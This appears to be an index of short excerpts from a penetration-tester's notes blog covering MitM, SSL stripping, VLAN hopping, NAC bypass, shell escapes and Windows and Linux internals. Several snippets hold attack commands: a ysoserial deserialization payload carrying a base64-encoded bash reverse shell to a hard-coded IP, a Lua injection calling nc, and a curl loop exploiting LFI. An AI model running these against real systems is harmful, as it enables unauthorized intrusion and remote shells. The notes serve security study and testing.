-
Show info: dpkg --info $package Show all files of a deb: dpkg -L $package Show all installed packages: dpkg -l Search for a file or path: dpkg -S htpasswd Show why a package was installed: apitude why apache2-utils About deb files A deb file is a ar archive with this structure: $ ar t example.debdebian-binarycontrol.tar.xz (or .gz or…
-
Some notes: Build an own Kali ISO image apt install curl git live-buildgit clone https://gitlab.com/kalilinux/build-scripts/live-build-config.gitcd live-build-config..../build.sh --verbose This will create a custom ISO.
-
Other
-
The four process ID’s For each process, Linux manages four UID’s. When a process from a user with UID 1000 is started/forked, then the new process has normally also the UID 1000. However, with SUID/GUID it becomes more complicated, since processes can get other UIDs than the one of the caller. When a process like passwd…
-
Named pipes A named pipe is a method for remote or local IPC Inter-process communication. Basic commands Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (which are shown with the dir command): attrib +r file.exe Set file system permissions (which are shown with the icacls command):…
-
Get information from a (minified) JS (e.g. from Angular):
-
(!) If upload does not seem to work, change the suffix e.g. from .php to .pHp. More: File uploads / images
-
First, try to determine the shell echo $PATH echo $SHELL Try to set the PATH variable export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin Upload the escape_from_restricted_shell.c program (scripts directory). Have a look into a local bin directory and see if you can use any binary there to escape.
-
Assume you have a buffer overflow vulnerability. You can control the EIP. But your shellcode is never executed. Your shellcode is executed when a ret instruction is executed which calls the address you overwrite. But maybe the ret at the end of the function where the buffer overflow occurs is never reached, because you overwrote the…
-
SID Security Identifiers All elements have attributes. They are identified via a Security Identifier SID. The structure of a SID: Example: The Domain Identifier ist the SID without the last RID part. Examples for well-known SIDs: Basic Windows security access control Security context Mandatory Integrity Control and integrity levels Windows (from Vista on) has five integrity levels:…
-
This page contains various unstructured notes about crypto related things. General notes If you find somewhere that something should be random, but it isn’t, this is already an important finding. Stream Ciphers A stream cipher encrypts a cleartext bit for bit or character for character (normally via XOR) with a secret key. It produces a…
-
mitmdump is a proxy which can store and modify content. Change content of a third-party site Scenario: You want to manipulate some content from a website $target visits. Perform ARP-poisening with Bettercap, Ettercap, the http_hijack.py script or somehow else. Start mitmdump in transparent mode:mitmdump --mode transparent --replace /~s/wars/trek/or alternatively to read the new content from a…
-
Bypass HSTS is based on hostnames. If a target already visited www.supersite.example, you can try to redirect the target to a similar domain which the browser never visited before and thus doesn’t has HSTS activated. Rewrite the Host HTTP header for your server you want to impersonate and add another character, e.g. wwww.supersite.example. You prepared…
-
SSLstrip works as proxy which replaces HTTPS references in HTTP, HTML, JS,.… responses with HTTP versions. Installation: SSLstrip is old. Create a venv and install an older version of twisted: venv/bin/pip install Twisted==18.9.0 Remove HTTPS references via MitM Scenario: You want that $target routes all HTTP traffic through your own system. Your system should remove each…
-
Socat If Socat is not on the target system, upload a static binary. This will listen to port 5555 and forward it to the given IP on the given port deeper in the target’s network: socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432 Proxychains ! If proxychains is slow, especially while port scanning, try to reduce the following parameters:…
-
This is an overview blog post. MitM Ettercap Bettercap L2 Scapy L2 mitmdump L3 Loki Various VLAN attacks NAC Network admission control Other tools and notes: Use http_hijack.py in the P151 script directory) to quickly set up a MitM. Check if you can See OSPF packets. Inspect then in Wireshark for the Auth Type field. If this is…
-
Definitions: A trunk connection is a connection between two switches. Tools Yersinia is a layer 2 modification framework. VoIPHopper is a simple tool which can sniff VoIP traffic and output the VLAN ID from the VoIP network:voiphopper -c 0 -i eth0 Enumerate existing VLANs Start Yersiniayersinia -I Press g Select DTP Press 5 to see…
-
Caution: Don’t change the MAC address via a remote session because of reasons… Linux ifconfig eth0 ether 00:01:02:03:04:05 Mac ifconfig en0 ether 00:01:02:03:04:05 Windows macshift e.g.
-
Techniques which decides if a new device can join the normal or a special network. A captive portal forces a client to an authentication page. After authentication in a normal low-security environment (where you cannot assume preconfigured systems) the authentication is usually granted to a combination of MAC and IP. Therefore, try to sniff valid…
-
Malware (Notes are taken from the TryHackMe course.) John von Neumann (!) created a concept of malicious software in 1949. The first implementation was done in 1971 by Bob Thomas. The program Creeper jumped from one system (running the operating system Tenex) to another and just printed a message on each console. The team Nematode is…
-
If you can provide a serialized (.ser) file, try to create a payload directly, if you have the source code, or just use a yoserial payload. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser // Prepare a reverse shell command line an transform it into b64. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…
-
File and directory integrity levels C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are inherited from the parent = directory. Note that the Read right ® also enables execution on that file! (There…
-
Determine if the system has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is running, then commands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL To install the WSL, a system shell is required unfortunatelly. See this article for installation.
-
Dumpzilla Extracts the content of a profile directory. Download the profile directory. See what we have:dumpzilla 84p8ofq6.default --Summary Use the modules to see details.
-
Shows all process in a wide consoleps auxww sudo = doas
-
https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities Notes A comment can be done with //. Add this after an injectionindex?file=bla');os.execute('nc...')--
-
Important notes Copy+paste For Linux: base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar For Windows: base64 p64.exe | sed 's/^(.*)$/echo \1 >> b64/g' ... certutil -encode file.exe b64.txt certutil -decode b64.txt file.exe Alternative: python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))" ... python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))" Alternative: python -m base64 -e test > test.b64 ... python -m base64…
-
After these steps, more things to do: Work with processes For enumeration of processes, see the Basic Windows system enumeration post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Suspend and continue a running process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…
-
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…